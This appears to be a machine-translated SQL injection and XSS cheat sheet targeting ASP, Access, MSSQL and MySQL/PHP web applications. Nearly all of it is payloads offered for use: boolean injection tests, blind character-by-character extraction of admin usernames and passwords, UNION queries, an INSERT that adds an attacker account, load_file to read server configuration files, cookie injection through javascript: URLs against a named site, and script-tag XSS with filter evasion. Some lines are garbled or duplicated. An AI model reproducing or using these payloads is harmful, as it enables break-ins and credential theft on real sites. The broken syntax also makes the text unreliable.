The first step is to remove the check box before the Internet option advanced display friendly HTTP Error message of the IE menu tool. Otherwise, no matter what error is returned by the server, IE Only displays as an HTTP500 server error and cannot receive more prompts. Number Type: and11and12 determines whether injection exists: and11and12
Step 1 first remove the check box before IE menu => tool => Internet option => advanced => show friendly HTTP Error messages. Otherwise, no matter what error is returned by the server, IE Only displays as an HTTP 500 server error and cannot receive more prompts.
Number Type: and 1 = 1 and 1 = 2 to determine whether injection exists
Character Type: 'and'1' = '1' and '1' = '2
Search type: keyword % 'and 1 = 1 and' % '=' % keyword % 'and 1 = 2 and' % '=' %
When IIS reports an error:
And user> 0 (whether ACCESS or MSSQL is used)
If no error is reported, use the respective database features for determination.
And (select count (*) from msysobjects)> 0 (return access database with insufficient permissions)
And (select count (*) from sysobjects)> 0 (MSSQL database is returned normally)
And db_name ()> 0 (return database name)
And 0 <> (select @ version) -- (determine version information)
And db_name ()> 0 (return database name)
* *********** Note: you must first find the background address before guessing, or else you will be too busy **********
ACCESS injection:
Name of the table to be guessed (admin exists if the table is normal, and admin exists if the table is abnormal)
AndExIsts (select * from [admin])
And (Select Count (*) from Admin)> 0
Guess the field: (if the field username exists, it is normal. If it is abnormal, it does not exist)
And (Select username from Admin)> 0
And exists (select username from [admin])
Guess the username and password length
And (select top 1 len (username) from Admin)> 0
And (select top 1 len (password) from Admin)> 0
Principle: if the length of the username in top 1 is greater than 0, the condition is true. Then, the test goes on like> 1,> 2,> 3 until the condition is not true, for example, if 4 is true or 5 is not true, It means len (username) = 5, that is, the username length is 5. after obtaining the length of username, use mId(Username, N, 1) truncates the nth character, and then asc (mid (username, N, 1) to obtain the ASCII code.
Guess the user
And (select top 1 asc (mid (username,) from Admin)>, 2 ...,
When the input is 109, an error is displayed. If the input is correct before 108, the ASCII code of the first character is 109, and the first character is m.
Similarly, and (select top 1 asc (mid (username,) from Admin)>, 2...
It is not true when it reaches 114, indicating that the second character's ASCII code value is 114, and the character is r.
Note that the ASCII code between English and numbers is 1...
MSSQL injection:
Having 1 = 1 -- [A Table Name and field are displayed. For example, the column 'users. id' is invalid in the selection list]
Group by users. ID having 1 = 1 --
Group by users. ID, users. username, users. password, users. privs having 1 = 1 --
; Insert into users values (666, attacker, foobar, 0 xffff) -- [insert a new record]
Name of the table to be guessed:
Every database in SQL SERVER will use user tables and system tables. In the system table sysobjects, each object created in the database (constraints, default values, logs, rules, stored procedures, etc) in the sysobjects table, the table name of the current database exists in the table. We usually use three parameters: name (data table name), xtype (data table type u is user table), and id (data table object flag ).
And (select top 1 name from sysobjects where xtype = 'U')> 0 (obtain the first table name, such as user)
And (select top 1 name from sysobjects where xtype = 'U' and name not in ('user')> 0 to get the second table name, and so on ..
Name of the name to be guessed:
Two built-in functions are used.Col_ Name () and object_id (). The format of col_name () is "COL_NAME (table_id, column_id)". The table_id parameter is the table ID, and column_id is the column ID, object_id (admin) is the ID number of the admin in sysobjects. column_id = 1, 2, 3 indicates column 1, 2, and 3 of the admin.
And (select top 1 col_name (object_id ('admin'), 1) from sysobjects)> 0 [obtain the first column name of the admin field, "username", and so on, obtain "password", "id", and so on]
Guess the content of the field:
And (select top 1 username from [admin])> 0 [get user name directly]
And (select top 1 password from [admin])> 0 [get password directly]
UNION Joint query:
Select name, password, id from user union select user,Pwd, Uid from Table Name
And 1 = 1 union select 1, 2, 3, 4, 5... from Table Name (the value is slowly added from 1. If it is added to 5, it returns normal, there are 5 fields)
ASCII verbatim decoding:
1. Length of the column to be guessed
And (select top 1 len (column name) from Table Name)> N
Where N is a number and the value of this N is used to guess the length of the column. If N is 6 Correct and 7 is incorrect, the length is 7.
To guess the second record, use: select top 1 len (column name) from table name where column name not in (select top 1 column name from table name)
2. Guess the user and password
ASC () and Mid functions. ASC (column name, N, 1) obtains the nth ASCII code of the "column name ".
The explain statement is: and (select top 1 asc (mid (field, 1, 1) from database name)> ASCII code
Interval judgment statement:... between... and ......
Chinese processing method: When the ASCII conversion is negative, use the abs () function to obtain the absolute value.
Example: and (select top 1 abs (asc (mid (field,) from database name) = ASC code
ASCII verbatim decoding:
1. Name of the table to be guessed: and (select count (*) from admin) <> 0
2. Name of the column to be guessed: and (select count (column name) from Table Name) <> 0
3. Number of users to be guessed: and (select count (*) from Table Name)> 1, 2 .. 2 normal, 3 error, 3 records in the table.
4. Length of the username to be guessed: and (select len (column name) from Table Name)> = 1,> = 2,> = 3,> = 4.
5. Guess the username: and (select count (*) from table name where (asc (mid (column name, 130) between 30 and) <> 0
Last submitted: and (select asc (mid (column name, 1, 1) from Table Name) = ascii Value
6. Guess the Administrator's password:
According to the above principle, replace the column name (asc (mid (column name,) in the above statement with PASSWORD to get the PASSWORD.
MYSQL +PHPInjection:
1. Determine whether there is an injection, add '; and 1 = 1; and 1 = 2
2. Determine the version and ord (mid (version (), 4.0)> 51/*. If the returned result is normal, the version is later than. You can use union to query
3. Use the order by violence field and add order by 10/* after the URL. If the returned result is normal, the field is greater than 10.
4. Use union to query accurate fields, for example, and 1 = 2 union select 1, 2, 3,.../* until the return result is normal, indicating that the number of accurate fields is guessed. If spaces are filtered, use/**/instead.
5. determine whether the database connection account has the write permission, and (select count (*) from mysql. user)> 0/* if an error is returned, we can only guess the Administrator account and password.
6. If the returned result is normal, you can use and 1 = 2 union select 1, 2, 3, 4, 5, 6, load _File(Char (ascii values of the file path, separated by commas), 8, 9, 10/* Note: load_file (char (ascii values of the file path, separated by commas )) you can also read the configuration file and find the database connection in hexadecimal format.
7. First, guess the user table, for example, and 1 = 2 union select 1, 2, 3, 4, 5, 6... from user/*. If the returned result is normal, the table exists.
8. if you know the table, you can guess the field, and 1 = 2 union select 1, username, 3, 4, 5, 6 .... from user/* If field content is displayed in Field 2, some fields exist.
9. In the same way, I guess the password field again.
Cookie injection:
Condition: ID = Request ("ID"). (The WEB server first obtains the data in GET. If not, it obtains the data in POST and does not retrieve the data in Cookies ); if the cookie is not filtered, cookie injection is triggered.
* ***** Use Request. QuerySTrIng or Request. FoRmWhen collecting data, you cannot use Cookies to inject ******
Determine whether cookie injection exists
Example: http://www.xiaoweio.cn/1.asp? Id = 44
The input http://www.xiaoweio.cn/1.asp display is not normal because there is no input parameter.
Javascript: alert (document. cookie = "id =" + escape ("44 and 1 = 1"); refresh the page and the page is displayed normally. Try again (if not, it may also be filtered out)
Javascript: alert (document. cookie = "id =" + escape ("44 and 1 = 2"); refresh the page. If it is not displayed properly, it indicates that there is an injection.
Guess length:
Javascript: alert (document. cookie = "id =" + escape ("44 and (select len (password) from admin) = 16 "))
Guess the content:
Javascript: alert (document. cookie = "id =" + escape ("44 and (select asc (mid (username) from admin) = 97 "))
PHP injection:
Determine the injection point: '; and 1 = 1'; and 1 = 2
Judge UNION: and ord (mid (version (), 4.0)> 51. If the returned result is correct, can be queried by UNION.
Use the order by brute-force field: order by n (n = 1, 2, 3 ..) (when n is 3, 4 is incorrect, then 3 fields)
Use union to query accurate fields: and 1 = 1 union select 1, 2, 3 ,....... (When the returned result is normal, it indicates that the number of accurately guessed fields = The Last number)
Check whether the database connection account has the write permission: and (select count (*) from mysql. user)> 0 (if an error is returned, we can guess the Administrator's account password. If the returned result is normal, you can use
And 1 = 2 union select 1, 2, 3, 4, 5, 6, load_file (char (ascii values of the file path, separated by commas), 8, 9, 10 [Note: load_file (char (the ascii value of the file path, separated by commas) can also be written in hexadecimal format, read the configuration file in this way])
Guess the table: and 1 = 2 union select 1, 2, 3, 4, 5, 6... from user (this table exists if the returned result is normal)
Guess the field: and 1 = 2 union select 1, username, 3, 4, 5, 6 .... from user (in the same way, replace it by yourself. If field content is displayed in Field 2, some fields exist)
Similarly, you can guess the password field.
Cross-site:
Script alert ("Cross-Site") script (most commonly used)
(? Spaces obtained by using the tab key)
(/**/Comments)
Html Entity
Unicode